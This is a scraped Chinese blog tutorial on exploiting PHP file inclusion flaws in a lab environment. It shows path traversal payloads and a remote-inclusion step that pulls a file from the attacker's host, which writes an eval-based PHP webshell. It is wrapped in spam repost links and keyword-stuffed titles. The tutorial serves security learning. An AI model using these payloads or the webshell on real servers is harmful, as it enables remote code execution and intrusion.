当前位置: 首页 > news >正文 哪里可以做虚拟货币网站如何免费申请自己的网站 news 2025/11/3 4:04:49 哪里可以做虚拟货币网站,如何免费申请自己的网站,网站服务器搬家,wordpress更换域名更改数据库文章目录 1、文件包含漏洞概述1.1 文件包含漏洞1.2 相关函数1.3 文件包含漏洞分类 2、File Inclusion(local)3、File Inclusion(remote) 1、文件包含漏洞概述 1.1 文件包含漏洞 文件包含漏洞#xff1a;在web后台开发中#xff0c;程序员往往为了提高效率以及让代码看起来更… 文章目录 1、文件包含漏洞概述1.1 文件包含漏洞1.2 相关函数1.3 文件包含漏洞分类 2、File Inclusion(local)3、File Inclusion(remote) 1、文件包含漏洞概述 1.1 文件包含漏洞 文件包含漏洞在web后台开发中程序员往往为了提高效率以及让代码看起来更简洁会使用“包含”函数功能。比如把一系列功能函数都写进function.php中之后当某个文件需要调用的时候就直接在文件头中写上一句?php include function.php?就可以调用函数代码。但有些时候因为网站功能需求会让前端用户选择需要包含的文件或者在前端的功能中使用了“包含”功能又由于开发人员没有对要包含的这个文件进行安全考虑就导致攻击者可以通过修改包含文件的位置来让后台执行任意文件代码。 需要注意的是php的文件包含不管文件后缀名是什么只要包含php代码就可以被当作php代码解析。 1.2 相关函数 文件包含包含函数在php中通过include()、include_once()或require()、require_once()语句可以将php文件的内容插入另一个php文件在服务器执行它之前。include()和include_once()的区别在于include_once()只能包含一次相同的文件。 include和require函数在错误处理方面有所不同 require会生成致命错误E_COMPILE_ERROR并停止脚本include只生成警告E_WARNING并且脚本会继续。 1.3 文件包含漏洞分类 根据不同的配置环境文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞 1本地文件包含漏洞 仅能够对服务器本地的文件进行包含由于服务器上的文件并不是攻击者所能够控制的因此该情况下攻击着更多的会包含一些固定的系统配置文件从而读取系统敏感信息。 2远程文件包含漏洞 能够通过url地址对远程的文件进行包含这意味着攻击者可以传入任意的代码。 此处的本地指的是服务器端远程指的是非服务器端。 2、File Inclusion(local) 1在搜索框中选择kobe之后1url变为http://192.168.92.1:32769/vul/fileinclude/fi_local.php?filenamefile1.phpsubmit%E6%8F%90%E4%BA%A4 观察到url中出现filenamefile1.php那么该目录下是否存在fileX.php文件呢 2发现隐藏文件对文件名进行爆破可以发现file6、file7、file8、file9、file10、file100返回异常。说明存在隐藏文件。 3读取不同文件夹的文件 filenamefile9.php返回了报错通过这个报错可以知道fi_local.php中用来进行文件包含的函数是include()并且包含的文件路径为与fi_local.php同文件夹下include文件夹中的文件。 payloadhttp://192.168.92.1:32769/vul/fileinclude/fi_local.php?filename/../../submit%E6%8F%90%E4%BA%A4可以发现现在include函数中的相对路径已经跳转到了/app/vul路径下了。也就是说只要我们知道某个文件的相对位置就可以访问它。 3、File Inclusion(remote) 1远程文件包含这里同样是通过传递一个文件名进行包含。 2filename改为www.baidu.com后会直接访问百度 3在 Kali 上在 /var/www/html/ 中新建一个shell.txt输入下面的内容 ?php $myfile fopen(shell.php, w); $txt ?php eval($_POST[cmd]);?; fwrite($myfile, $txt); fclose($myfile); ?同时使用service apache2 start开始apache服务构造payload http://192.168.92.1/vul/fileinclude/fi_remote.php?filenamehttp://192.168.92.1/shell.txtsubmit提交 貌似什么也没发生我们需要访问生成的shell.php文件就可以拿到webshell了。 4连接webshell 另外远程包含漏洞前提如果使用 includer 和 require 则需要 php.ini 配置如下 allow_url_fopen on;默认开 allow_url_include on;默认关 文章转载自: http://www.morning.china-cj.com.gov.cn.china-cj.com http://www.morning.mydgr.cn.gov.cn.mydgr.cn http://www.morning.pbknh.cn.gov.cn.pbknh.cn http://www.morning.bpxmw.cn.gov.cn.bpxmw.cn http://www.morning.rwls.cn.gov.cn.rwls.cn http://www.morning.prgrh.cn.gov.cn.prgrh.cn http://www.morning.ltxgk.cn.gov.cn.ltxgk.cn http://www.morning.dzqyn.cn.gov.cn.dzqyn.cn http://www.morning.nspbj.cn.gov.cn.nspbj.cn http://www.morning.mrfgy.cn.gov.cn.mrfgy.cn http://www.morning.qhrlb.cn.gov.cn.qhrlb.cn http://www.morning.taojava.cn.gov.cn.taojava.cn http://www.morning.hgcz.cn.gov.cn.hgcz.cn http://www.morning.rnds.cn.gov.cn.rnds.cn http://www.morning.qdlnw.cn.gov.cn.qdlnw.cn http://www.morning.zcwwb.cn.gov.cn.zcwwb.cn http://www.morning.rtsdz.cn.gov.cn.rtsdz.cn http://www.morning.pqyms.cn.gov.cn.pqyms.cn http://www.morning.mfqmk.cn.gov.cn.mfqmk.cn http://www.morning.mzjbz.cn.gov.cn.mzjbz.cn http://www.morning.dyhlm.cn.gov.cn.dyhlm.cn http://www.morning.rpstb.cn.gov.cn.rpstb.cn http://www.morning.jqmqf.cn.gov.cn.jqmqf.cn http://www.morning.hnkkf.cn.gov.cn.hnkkf.cn http://www.morning.fkwp.cn.gov.cn.fkwp.cn http://www.morning.kydrb.cn.gov.cn.kydrb.cn http://www.morning.zyndj.cn.gov.cn.zyndj.cn http://www.morning.tnfyj.cn.gov.cn.tnfyj.cn http://www.morning.sqhtg.cn.gov.cn.sqhtg.cn http://www.morning.qzdxy.cn.gov.cn.qzdxy.cn http://www.morning.sfwcb.cn.gov.cn.sfwcb.cn http://www.morning.hhxwr.cn.gov.cn.hhxwr.cn http://www.morning.rbcw.cn.gov.cn.rbcw.cn http://www.morning.rfyff.cn.gov.cn.rfyff.cn http://www.morning.lbpfl.cn.gov.cn.lbpfl.cn http://www.morning.gsdbg.cn.gov.cn.gsdbg.cn http://www.morning.ttvtv.cn.gov.cn.ttvtv.cn http://www.morning.shangwenchao4.cn.gov.cn.shangwenchao4.cn http://www.morning.jtmql.cn.gov.cn.jtmql.cn http://www.morning.zxhpx.cn.gov.cn.zxhpx.cn http://www.morning.pbmkh.cn.gov.cn.pbmkh.cn http://www.morning.kghhl.cn.gov.cn.kghhl.cn http://www.morning.yhwxn.cn.gov.cn.yhwxn.cn http://www.morning.rmxgk.cn.gov.cn.rmxgk.cn http://www.morning.rwjh.cn.gov.cn.rwjh.cn http://www.morning.jstggt.cn.gov.cn.jstggt.cn http://www.morning.dbddm.cn.gov.cn.dbddm.cn http://www.morning.xdfkrd.cn.gov.cn.xdfkrd.cn http://www.morning.xinyishufa.cn.gov.cn.xinyishufa.cn http://www.morning.dbrdg.cn.gov.cn.dbrdg.cn http://www.morning.ljdd.cn.gov.cn.ljdd.cn http://www.morning.zttjs.cn.gov.cn.zttjs.cn http://www.morning.yjtnc.cn.gov.cn.yjtnc.cn http://www.morning.lqjlg.cn.gov.cn.lqjlg.cn http://www.morning.rjjjk.cn.gov.cn.rjjjk.cn http://www.morning.xxrgt.cn.gov.cn.xxrgt.cn http://www.morning.mhrzd.cn.gov.cn.mhrzd.cn http://www.morning.jjhrj.cn.gov.cn.jjhrj.cn http://www.morning.rbrd.cn.gov.cn.rbrd.cn http://www.morning.nywrm.cn.gov.cn.nywrm.cn http://www.morning.zqnmp.cn.gov.cn.zqnmp.cn http://www.morning.rdymd.cn.gov.cn.rdymd.cn http://www.morning.knlyl.cn.gov.cn.knlyl.cn http://www.morning.ryysc.cn.gov.cn.ryysc.cn http://www.morning.rnqbn.cn.gov.cn.rnqbn.cn http://www.morning.nbqwr.cn.gov.cn.nbqwr.cn http://www.morning.sftrt.cn.gov.cn.sftrt.cn http://www.morning.nkcfh.cn.gov.cn.nkcfh.cn http://www.morning.ahlart.com.gov.cn.ahlart.com http://www.morning.bfmq.cn.gov.cn.bfmq.cn http://www.morning.fssjw.cn.gov.cn.fssjw.cn http://www.morning.prgyd.cn.gov.cn.prgyd.cn http://www.morning.grxyx.cn.gov.cn.grxyx.cn http://www.morning.thrtt.cn.gov.cn.thrtt.cn http://www.morning.gfprf.cn.gov.cn.gfprf.cn http://www.morning.zryf.cn.gov.cn.zryf.cn http://www.morning.sthgm.cn.gov.cn.sthgm.cn http://www.morning.yrjhr.cn.gov.cn.yrjhr.cn http://www.morning.rgxf.cn.gov.cn.rgxf.cn http://www.morning.alive-8.com.gov.cn.alive-8.com 查看全文 http://www.tj-hxxt.cn/news/272720.html 相关文章: 沈阳网站建设模块北京专业的网站ui设计公司 怎样免费建自己的网站php网页设计完整代码 广州网站建设案例工艺品外贸订单网 南京做信息登记公司网站怎么运营一个微信公众号 wordpress带整站数据查商标名有没有被注册 攀枝花网站开发金华 网站建设 罗田企业网站建设网站建设大师 邢台网站改版怎么开发做网站公司济南 做威士忌的网站徐州球形网架公司 网站建设 诺德中心做网站挂广告 刷广告 新建免费网站佛山网站搭建公司哪家好 乔拓云智能建站免费注册wordpress 电商 开发 杭州市萧山区哪家做网站的公司好如何使用wordpress主题 做网站怎样租用虚拟空间网页设计的主题分析 厦门网站建设厦门seo龙海网站开发 网站建设文化案例作业精灵小程序入口 罗湖网站建设深圳信科wordpress照片插件 成都网站建设天府软件园什么是关键词搜索 网站建设工作策划书开源网站有哪些 李洋网络做网站烟台企业宣传片制作公司 网站建设课程任务互联网服务平台投诉 链接制作网站宜春网站设计公司 重庆网站服务器建设推荐昆明网络公司开发 盐城网站建设代理商长宁苏州网站建设公司 php网站架设教程手机网页游戏开发 做网站需要做什么全国住房与城乡建设部网站 网站建设一般多少钱方案去除wordpress主题版权 成功营销网站中英企业网站管理系统 荣耀华为手机商城官方网站站酷网电脑版 自己建网站花钱吗制作网站的工具
